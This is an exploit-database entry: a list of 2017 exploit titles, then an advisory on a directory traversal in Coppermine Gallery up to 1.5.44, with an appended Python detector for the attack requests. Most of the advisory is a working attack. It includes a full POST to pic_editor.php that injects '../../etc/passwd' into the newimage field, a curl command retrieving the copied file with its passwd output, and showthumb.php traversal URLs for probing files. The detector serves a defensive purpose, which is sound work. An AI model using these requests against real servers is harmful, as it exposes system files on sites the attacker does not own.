exploit-db-mirror/platforms/php/webapps/41876.txt
Offensive Security aabd4b35b3 DB: 2017-04-14
12 new exploits

Microsoft Windows Kernel win32k.sys - Multiple Bugs in the NtGdiGetDIBitsInternal System Call
Microsoft Windows Kernel - 'win32kfull!SfnINLPUAHDRAWMENUITEM' Stack Memory Disclosure

PonyOS 3.0 - tty ioctl() Local Kernel Exploit
PonyOS 3.0 - TTY 'ioctl()' Local Kernel Exploit

Solaris 7 - 11 (x86 & SPARC) - 'EXTREMEPARR' dtappgather Privilege Escalation
Solaris 7 < 11 (x86 / SPARC) - 'EXTREMEPARR' dtappgather Privilege Escalation
GNS3 Mac OS-X 1.5.2 - 'ubridge' Privilege Escalation
PonyOS 4.0 - 'fluttershy' LD_LIBRARY_PATH Local Kernel Exploit
Adobe Creative Cloud Desktop Application <= 4.0.0.185 - Privilege Escalation

Ethernet Device Drivers Frame Padding - Info Leakage Exploit (Etherleak)
Ethernet Device Drivers Frame Padding - 'Etherleak' Infomation Leakage Exploit

Cisco Catalyst 2960 IOS 12.2(55)SE1 - 'ROCEM' Remote Code Execution

Linux/x86-64 - execve(_/bin/sh_) Shellcode (31 bytes)
Coppermine Gallery < 1.5.44 - Directory Traversal Weaknesses
SedSystems D3 Decimator - Multiple Vulnerabilities
agorum core Pro 7.8.1.4-251 - Cross-Site Request Forgery
agorum core Pro 7.8.1.4-251 - Persistent Cross-Site Scripting
Alienvault OSSIM/USM 5.3.4/5.3.5 - Remote Command Execution (Metasploit)
2017-04-14 05:01:15 +00:00

Coppermine Gallery <= 1.5.44 directory traversal vulnerability
==============================================================
Coppermine is a multi-purpose fully-featured and integrated web
picture gallery script written in PHP using GD or ImageMagick as
image library with a MySQL backend. A directory traversal vuln
exists within the "save_thumb" function of the "crop & rotate"
image feature. This can be accessed from pic_editor.php. First
upload a file, e.g. "hackerhouse.png" to an album. This will
create a predictable file path location with your userid e.g:

http://target/cpg15x/albums/userpics/10001/hackerhouse.png

You will then send a POST request to pic_editor to manipulate
this file but replace the "new_image" with the filepath you
want to read such as "../../../../../etc/passwd". Your file
will then be copied to a predictable path location as thumb.

http://target/cpg15x/albums/userpics/10001/thumb_hackerhouse.png

To exploit this vulnerability you will need to be able to
register an account and upload files to a photo album. You
do not need admin rights to exploit this flaw. All versions
from cpg 1.4.14 to cpg 1.5.44 have been found vulnerable
to this flaw. The coppermine configuration was tested with
ImageMagick enabled, your mileage may vary with GD1.x/GD2.x.

To protect against this exploit do not allow public registration
requests and only allow trusted users to modify images.

Example POST request
====================
POST /cpg15x/pic_editor.php HTTP/1.1
Host: target
Content-Length: 802
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAE29AdEqShlpLpDF
Accept: text/html,
Accept-Language: en-GB,en-US;q=0.8,en;q=0.6
Cookie: <cookies>
DNT: 1
Connection: close

------WebKitFormBoundaryAE29AdEqShlpLpDF
Content-Disposition: form-data; name="clipval"

10
------WebKitFormBoundaryAE29AdEqShlpLpDF
Content-Disposition: form-data; name="newimage"

../../../../../../../../../../../../../../etc/passwd
------WebKitFormBoundaryAE29AdEqShlpLpDF
Content-Disposition: form-data; name="img_dir"

albums/edit/
------WebKitFormBoundaryAE29AdEqShlpLpDF
Content-Disposition: form-data; name="id"

1
------WebKitFormBoundaryAE29AdEqShlpLpDF
Content-Disposition: form-data; name="angle"

45
------WebKitFormBoundaryAE29AdEqShlpLpDF
100
------WebKitFormBoundaryAE29AdEqShlpLpDF
Content-Disposition: form-data; name="save_thumb"

Save as thumbnail
------WebKitFormBoundaryAE29AdEqShlpLpDF--

Example file download request
=============================
$ curl http://targetip/cpg15x/albums/userpics/10001/thumb_hackerhouse.png
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
... snip

An additional directory traversal vulnerability is present
in "showthumb.php" which can be used to stat() for the existence
of files by reviewing the error returned. You must have
sufficient rights to use this feature however.

/cpg15x/showthumb.php?picfile=../../../../../../etc/passwd
/cpg15x/showthumb.php?picfile=../../../../../../etc/non-existantfile

-- Hacker Fantastic
(http://www.myhackerhouse.com)
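
A log or proxy check for the two request patterns described above, as an added example that is not part of the original advisory: it parses the multipart body sent to pic_editor.php and the query string sent to showthumb.php, and flags "newimage" or "picfile" values that are absolute or climb out of their starting directory. The function names, the XBOUND boundary and the sample request are constructed for illustration.

```python
import posixpath
from email import message_from_bytes
from urllib.parse import parse_qs, unquote, urlsplit

# Script -> parameters the advisory shows carrying a file path.
WATCHED = {"pic_editor.php": {"newimage"}, "showthumb.php": {"picfile"}}

def climbs_out(value):
    """True if the path is absolute or normalises to something above its start directory."""
    # Undo up to two extra layers of percent-encoding; treat backslashes as separators.
    decoded = unquote(unquote(value)).replace("\\", "/")
    if "\x00" in decoded or decoded.startswith("/"):
        return True
    norm = posixpath.normpath(decoded)
    return norm == ".." or norm.startswith("../")

def multipart_fields(content_type, body):
    """Parse a multipart/form-data body into {field name: value}."""
    msg = message_from_bytes(b"Content-Type: " + content_type.encode() + b"\r\n\r\n" + body)
    fields = {}
    for part in msg.walk():
        name = part.get_param("name", header="content-disposition")
        if name and not part.is_multipart():
            fields[name] = part.get_payload(decode=True).decode("utf-8", "replace").strip()
    return fields

def inspect_request(method, url, content_type="", body=b""):
    """Return sorted (script, parameter, value) findings for one logged request."""
    parts = urlsplit(url)
    script = posixpath.basename(parts.path)
    params = {k: v[0] for k, v in parse_qs(parts.query).items()}
    if method == "POST" and content_type.startswith("multipart/form-data"):
        params.update(multipart_fields(content_type, body))
    hits = WATCHED.get(script, set()).intersection(params)
    return [(script, p, params[p]) for p in sorted(hits) if climbs_out(params[p])]

# Constructed sample modelled on the advisory's POST; "XBOUND" is a placeholder boundary.
SAMPLE_CT = "multipart/form-data; boundary=XBOUND"
SAMPLE_BODY = (b'--XBOUND\r\nContent-Disposition: form-data; name="newimage"\r\n\r\n'
               b'../../../../etc/passwd\r\n'
               b'--XBOUND\r\nContent-Disposition: form-data; name="img_dir"\r\n\r\n'
               b'albums/edit/\r\n--XBOUND--\r\n')

if __name__ == "__main__":
    print(inspect_request("POST", "/cpg15x/pic_editor.php", SAMPLE_CT, SAMPLE_BODY))
    print(inspect_request("GET", "/cpg15x/showthumb.php?picfile=userpics/10001/thumb_a.png"))
```

A value such as "sub/../pic.png" is not flagged because it normalises to a path inside its starting directory; only values that end up above it, or that are absolute, are reported.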